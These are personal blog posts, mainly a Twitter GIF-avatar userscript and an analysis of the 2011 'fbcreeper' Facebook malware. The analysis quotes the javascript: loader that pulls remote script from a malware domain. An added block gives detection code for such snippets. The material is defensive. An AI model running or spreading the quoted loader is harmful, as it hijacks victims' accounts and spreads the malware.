On February the 4th I had a small presentation at Thessaloniki Tech Talk Sessions, on hijacking web sessions and injecting code at the lower layers of a local area network. Here you can find the slides and a little paper I wrote on the topic:
Bad Decisions 101: Animated Avatars On Twitter
While I was browsing my timeline today, I noticed some re-tweets of people who had annoyingly blinky avatars. I guess Twitter missed the old days, when browsing the web could give you an epileptic seizure. Since people tend to get excited about stupid ideas, I took the time to write a little GreaseMonkey script for Twitter, which substitutes GIF avatars with Twitter’s default avatar (an egg or something). So now when the blinky pink “Hello, Kitty” apocalypse comes, I’ll be prepared.
You can grab the script from here.
/*
A little GreaseMonkey script for Twitter, which replaces GIF avatars
with the Twitter's default avatar in your timeline.
Karagasidis Dimitris, http://gatoni.gr
*/
// ==UserScript==
// @name         Twitter GIF Avatar Blocker
// @namespace    http://gatoni.gr
// @description  A script which substitutes GIF avatars with the Twitter's default avatar
// @include      http://twitter.com/*
// ==/UserScript==
function eliminate_gifs() {
    var avatars = document.getElementsByTagName("img");
    // Indexed loop: for...in over an HTMLCollection also visits "length", "item", etc.
    for ( var i = 0; i < avatars.length; i++ ) {
        // Check if the image is an avatar in the timeline
        if ( avatars[i].className == "user-profile-link" || avatars[i].className == "photo fn" ) {
            // Substitute the animated avatar with the Twitter's default avatar
            if ( avatars[i].src.substr(-3).toLowerCase() == "gif" ) {
                avatars[i].src = "http://a1.twimg.com/sticky/default_profile_images/default_profile_0_normal.png";
            }
        }
    }
}
// Run once now, then every 3 seconds to catch avatars loaded later
eliminate_gifs();
setInterval( eliminate_gifs, 3000 );
Static analysis of fbcreeper/procreeper/profilechecker/thefbcreeper Facebook malware
Spent the day de-obfuscating and analyzing the code of a piece of malware I found on the wall of one of my contacts. It took me quite a few hours, since I de-obfuscated the code manually in a text editor. At least now I can build a decent code obfuscator on my own. :p
You can read the de-obfuscated and fully documented code here.
These are the URLs distributing the malware:
- http://fbcreeper.info/
- http://procreeper.info/
- http://profilechecker.info/
- http://thefbcreeper.info/
This is what this malware does:
- Posts links on victim’s wall, which advertise the malware
- Posts links to victim’s contacts’ walls, which advertise the malware
- Posts links to pages created or administered by victim, which advertise the malware
- Adds users with emails lethaburbach890@yahoo.com and chunfeezellwytm@hotmail.com as administrators to the pages created by the victim.
- Sends private messages, advertising the malware
- “Likes” pages “DJ-Emphatic” and “OH Whutt” with victim’s account
- Invites all contacts to an event (which seems to be removed now)
- Sends user to http://fbviews.org/result.php, where the user is asked to do some “anti-spam verification tests” before he can view the results. Of course there are no results, and the malware developers earn money from bringing traffic to the sites mentioned there.
As of now (22nd February 2011, 23:40 GMT+2), somewhere between 11,000 and 20,000 accounts are infected.
The malware is injected through a javascript code snippet:
javascript: (a = (d = document).createElement("script")).src = "http://fbcreeper.info/StalkerTools.fb";void(d.body.appendChild(a))
Do NOT inject and execute unknown code in your browser address bar. If you happened to use this application/malware, check your pages’ administrators, log out of your Facebook account, clear your browsing history and remove any links left on your wall and your pages.
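A defender-side check for snippets like the loader quoted above, added here as an example and not part of the original post or of the de-obfuscated malware code. It flags pasted javascript: text that creates a script element and points it at a remote URL, and matches the host against the four distribution domains listed in the post; the function names and the sample inputs other than the first are assumptions.

```javascript
// Added example. DISTRIBUTION_HOSTS is the list from the post; all names are hypothetical.
const DISTRIBUTION_HOSTS = new Set([
  "fbcreeper.info", "procreeper.info", "profilechecker.info", "thefbcreeper.info",
]);

// Constructed inputs: the first mirrors the loader quoted in the post, the rest are made up.
const SAMPLES = [
  'javascript: (a = (d = document).createElement("script")).src = "http://fbcreeper.info/StalkerTools.fb";void(d.body.appendChild(a))',
  "javascript:var s=document.createElement('script');s.src='https://cdn.example.test/x.js';document.body.appendChild(s)",
  "Check out my photos at http://example.test/photos, 100% legit",
];

// Percent-decode when possible, since a pasted snippet may arrive URL-encoded.
function normalize(text) {
  let out = text;
  try { out = decodeURIComponent(text); } catch (e) { /* malformed escapes: keep raw text */ }
  return out.replace(/\s+/g, " ").trim();
}

function analyzeSnippet(text) {
  const s = normalize(text);
  const findings = {
    javascriptScheme: /^javascript\s*:/i.test(s),
    createsScript: /createElement\(\s*["']script["']\s*\)/i.test(s),
    appendsNode: /\.(appendChild|insertBefore|append)\s*\(/.test(s),
    remoteSources: [],
    knownHosts: [],
  };
  // Collect every http(s) URL assigned to a .src property.
  const srcRe = /\.src\s*=\s*["'](https?:\/\/[^"']+)["']/gi;
  let m;
  while ((m = srcRe.exec(s)) !== null) {
    findings.remoteSources.push(m[1]);
    let host;
    try { host = new URL(m[1]).hostname.toLowerCase(); } catch (e) { continue; }
    host = host.replace(/^www\./, "");
    if (DISTRIBUTION_HOSTS.has(host)) findings.knownHosts.push(host);
  }
  const loadsRemoteScript = findings.createsScript && findings.remoteSources.length > 0;
  findings.verdict = findings.knownHosts.length > 0 ? "known-malware"
    : (findings.javascriptScheme && loadsRemoteScript) ? "suspicious"
    : "clean";
  return findings;
}
```

A "suspicious" verdict means the text has the same shape as the loader (javascript: scheme, script element, remote src) but an unlisted host, so it should be reviewed rather than trusted.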
Some lazy afternoon jamming…
Going through some lazy days, not working on anything in particular. Waiting for my exam period to end. Spent the day jamming on my guitar, and decided to record some parts of it. So this is the result.